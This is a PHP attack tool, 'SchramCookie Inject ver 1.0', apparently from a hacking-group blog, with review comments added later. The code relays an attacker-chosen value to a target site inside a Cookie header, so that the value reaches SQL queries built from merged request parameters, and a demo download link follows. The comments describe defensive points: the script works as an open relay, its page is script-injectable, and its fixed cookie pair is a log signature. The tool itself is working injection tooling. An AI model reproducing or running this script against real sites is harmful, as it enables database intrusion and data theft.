SchramCookie Inject ver 1.0
<?php
/*#########################################################################
 *
 *  - >> SchramCookie Inject ver 1.0
 *  C0de by Nig3h -Greetz To All H3xIe Member.
 *  link : xiaosan.cnblogs.com
 *  ex : http://host/?url={$argv[0]}?id = variable;
 *
 *#########################################################################
 */

/*
 * Review summary (code below is unchanged; only layout and comments were restored).
 *
 * What the script does, as far as the visible code shows:
 *   - reads the GET parameters `url` and `id`;
 *   - splits `url` into host, page path and a parameter name;
 *   - opens a plain TCP connection to that host on port 80 and sends an
 *     HTTP/1.0 POST whose Cookie header carries "<parameter name>=<id>";
 *   - echoes the response body back to the browser.
 *
 * Points a reviewer or defender should take from it:
 *   - There is no authentication and no allow-list for the destination, so a
 *     deployed copy lets any visitor make the hosting server connect to an
 *     arbitrary host on port 80 (an open request relay).
 *   - Request-derived values and the remote response are written into the
 *     page without htmlspecialchars(), so the page itself is script-injectable.
 *   - On the receiving side, a value delivered in the Cookie header reaches
 *     any code that reads the parameter from a merged request collection
 *     (e.g. $_REQUEST when cookies are part of request_order). Input
 *     validation, WAF rules and parameterised queries have to cover
 *     cookie-sourced values, not only the query string and form body.
 *   - Traffic signature visible in this file, usable for log review: HTTP/1.0
 *     POST, no User-Agent header, "Content-length: 0" together with a
 *     form-urlencoded Content-type, and a Cookie header starting with
 *     "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;".
 *   - get_magic_quotes_gpc() was removed in PHP 8.0; the script stops with a
 *     fatal error there when Printf_Info() runs.
 */

// Remove the execution time limit for this request.
ini_set("max_execution_time", 0);

// Module-level state shared with the functions below through `global`.
$Current_Host = null;
$Inj_Page = null;
$Query_String = null;
$Self = null;
$Query_Value = null;

// `url` is mandatory; `id` is read without an isset() check, so a missing
// `id` raises an undefined-index notice/warning and is passed on as null.
if (empty($_GET["url"])) die("<h5>Please Enter Query_String.</h5>");
Auto_($_GET["url"], $_GET["id"]);

/**
 * Prints an HTML status panel built from the five shared globals.
 *
 * Every value is concatenated into the markup as-is. $Self comes from
 * $_SERVER['PHP_SELF'] and the others derive from $_GET (see Auto_()), so
 * none of them is trusted data and none is escaped here.
 */
function Printf_Info() {
    GlOBAL $Current_Host, $Inj_Page, $Query_String, $Self, $Query_Value;
    $Magic_Quotes_GPC_Bool = False;
    // Removed in PHP 8.0 (deprecated in 7.4): calling it there is a fatal error.
    if (get_magic_quotes_gpc()) $Magic_Quotes_GPC_Bool = True;
    $GPC_Status = $Magic_Quotes_GPC_Bool == True?"On":"Off";
    echo '<html>'."\n";
    echo '<head><style type="text/css">'."\n";
    echo 'body{background-color: #CCE8CF; Font-size:12px;}.Style{font-size:11px;}'."\n";
    echo '</style></head>'."\n";
    echo '<body>'."\n";
    echo '<!-- Auth0r : Nig3h -->'."\n";
    echo '<br />'."\n";
    echo '<div align="center" class="Style">';
    // The next lines emit request-controlled strings without HTML escaping.
    echo '$_SERVER[<Font Color="red">PHP_SELF</Font>] : '.$Self.'<br />'."\n";
    echo 'HOST : '.$Current_Host.'<br />'."\n";
    echo 'Magic_Quotes_GPC : '.'<strong>'.$GPC_Status.'</strong><br />'."\n";
    echo 'Query_String : '.$Query_String.'<br />'."\n";
    echo 'GET[ID]_Value : <strong><Font Color="Red">'.$Query_Value.'</Font></strong><br />'."\n";
    echo 'Inject Page : '.$Inj_Page.'<br />'."\n";
    // "M-D-Y" is month abbreviation, weekday abbreviation, 4-digit year;
    // NOTE(review): 'D' is the weekday name, 'd' was probably intended.
    echo 'Time : '.Date("M-D-Y").'<br />'."\n";
    echo '<hr>';
    echo '</div>';
    echo '</body>'."\n";
    echo '</html>'."\n";
}

/**
 * Splits $url into host, page path and parameter name, stores the parts in
 * the shared globals, prints the status panel and starts the request.
 *
 * @param mixed $url Value of $_GET["url"]; expected to start with "http://".
 * @param mixed $id  Value of $_GET["id"]; stored as $Query_Value and passed on.
 */
function Auto_($url, $id) {
    $url_len = strlen($url);
    // Lower-cases the first seven characters and replaces each backslash
    // (chr(92)) with '//' before comparing against the scheme prefix.
    $str_http = str_replace(chr(92), '//', strtolower(substr($url, 0, 7)));
    if ($str_http == 'http://') {
        $host = substr($url, 7, $url_len);
    }
    // If the prefix test failed, $host was never assigned and the code below
    // runs on an undefined variable; there is no error path for that case.
    // The `<=` bound also reads one index past the end of the string.
    for ($i = 0; $i <= strlen($host); $i++) {
        if (($host[$i] == '/') or ($host[$i] == chr(92))) {
            // Everything before the first slash or backslash is the host.
            $_Current_Host = substr($host, 0, $i);
            break;
        }
    }
    // Path and query: from the first separator to the end of the URL.
    $Scr_Name = substr($host, $i, $url_len);
    $url_i = strlen($Scr_Name) + 1;
    $Scr_Begin = $i; // assigned but not used anywhere in this file
    // Scans $Scr_Name from the end towards the start for the last '?'.
    // The first index inspected is strlen($Scr_Name), one past the last character.
    for ($i = 0; $i < strlen($Scr_Name); $i++) {
        $url_i = $url_i - 1;
        if ($Scr_Name[$url_i] == '?') {
            $_Inj_Page = substr($Scr_Name, 0, $url_i); # sql_inject Page;
            break;
        }
    }
    GLOBAL $Query_String, $Current_Host, $Inj_Page, $Query_Value, $Self;
    // Parameter name: the text between that '?' and the first '=' in $Scr_Name.
    $Query_String = substr($Scr_Name, $url_i+1, strpos($Scr_Name, '=') - $url_i -1); # Query_String;
    // $_Current_Host / $_Inj_Page stay undefined when no separator or no '?'
    // was found; nothing validates the parsed parts before they are used.
    $Current_Host = $_Current_Host;
    $Inj_Page = $_Inj_Page;
    $Query_Value = $id;
    $Self = $_SERVER['PHP_SELF'];
    Printf_Info();
    Ini_Main($Current_Host, $Inj_Page, $Query_String, $id);
}

/**
 * Builds the Cookie header value and sends the request through POST().
 *
 * @param mixed $Current_Host Destination host; used unchecked as the connect target.
 * @param mixed $Inj_Page     Request path on that host.
 * @param mixed $Query_String Parameter name used as the cookie name.
 * @param mixed $id           Caller-supplied value placed in the cookie.
 */
function Ini_Main($Current_Host, $Inj_Page, $Query_String, $id) {
    # Config
    $Page_ID = $Query_String;
    $Host = $Current_Host;
    $Inj_Page = $Inj_Page; // self-assignment, no effect
    # END_CONFIG
    $inj_id = $id; // overwritten by the next statement
    // Only '=' and ' ' are percent-encoded; every other character passes through.
    $inj_id = str_replace("=", "%3D", $id);
    $inj_id = str_replace(" ", "%20", $inj_id);
    // Fixed first cookie pair followed by "<parameter name>=<value>". The fixed
    // pair is constant across requests, which makes it a usable log indicator.
    $Cookie_Str = "XUJUSPNGRWXKIXLMZRTR=NGQIVFESDSNWCEBNMJSJDEIAMQVQWZMKOLMOZRCG;"."$Page_ID=$inj_id";
    //$Data_Str = "id= $id";
    // $Data_Str is undefined because its assignment above is commented out, so
    // the request body is empty and PHP reports an undefined variable.
    // Port 80 and a 1000-second connect timeout are hard-coded.
    $_HTTP_SEND_rs = POST($Host, 80, $Inj_Page, $Data_Str, 1000, $Cookie_Str);
    // The remote body is written into this page; Kill_Waste() is the only filtering.
    echo $_HTTP_SEND_rs;
}

/**
 * Lower-cases $str and turns <script>, <style> and <head> tag openers into
 * HTML comment delimiters.
 *
 * This is plain substring replacement, not an HTML sanitiser: other elements
 * and attributes pass through untouched, '<head' also matches '<header', and
 * because POST() calls it once per fgets() chunk a tag split across two
 * chunks is not matched.
 *
 * @param mixed $str One chunk of the response body.
 * @return string The lower-cased chunk with the replacements applied.
 */
function Kill_Waste($str) {
    $str = strtolower($str);
    $str = str_replace('<script', '<!-- ', $str);
    $str = str_replace('</script', ' -->', $str);
    $str = str_replace('<style', '<!-- ', $str);
    $str = str_replace('</style', ' -->', $str);
    $str = str_replace('<head', '<!-- ', $str);
    $str = str_replace('</head', ' -->', $str);
    return $str;
}

/**
 * Sends an HTTP/1.0 POST over a plain socket and returns the filtered body.
 *
 * @param mixed  $host    Host to connect to; also written into the Host header.
 * @param mixed  $port    TCP port.
 * @param mixed  $path    Request path written into the request line.
 * @param mixed  $data    Request body.
 * @param mixed  $timeout Connect timeout in seconds, passed to fsockopen().
 * @param string $cookie  Value of the Cookie header.
 * @return string Response body after Kill_Waste(); the script dies instead of
 *                returning when the connection cannot be opened.
 */
function POST($host,$port,$path,$data,$timeout, $cookie='') {
    $buffer='';
    // Plain TCP, no TLS. The destination comes straight from the request.
    $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
    else {
        // No User-Agent or Accept header is sent.
        fputs($fp, "POST $path HTTP/1.0\r\n");
        fputs($fp, "Host: $host\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Cookie: $cookie\r\n");
        // Content-length counts $data only; the trailing "\r\n\r\n" written
        // after the body is not included.
        fputs($fp, "Content-length: ".strlen($data)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $data."\r\n\r\n");
        // Response headers are read up to the first blank line and collected,
        // but $headers is never used or returned.
        $headers = "";
        while ($str = trim(fgets($fp,4096))) $headers .= "$str\n";
        // Body: read in chunks of up to 4096 bytes, each filtered separately.
        while(!feof($fp)) {
            $buffer .= Kill_Waste(fgets($fp,4096));
        }
        fclose($fp);
    }
    return $buffer;
}
?>
Download demo:
https://files.cnblogs.com/xiaosan/SchramInj_demo.zip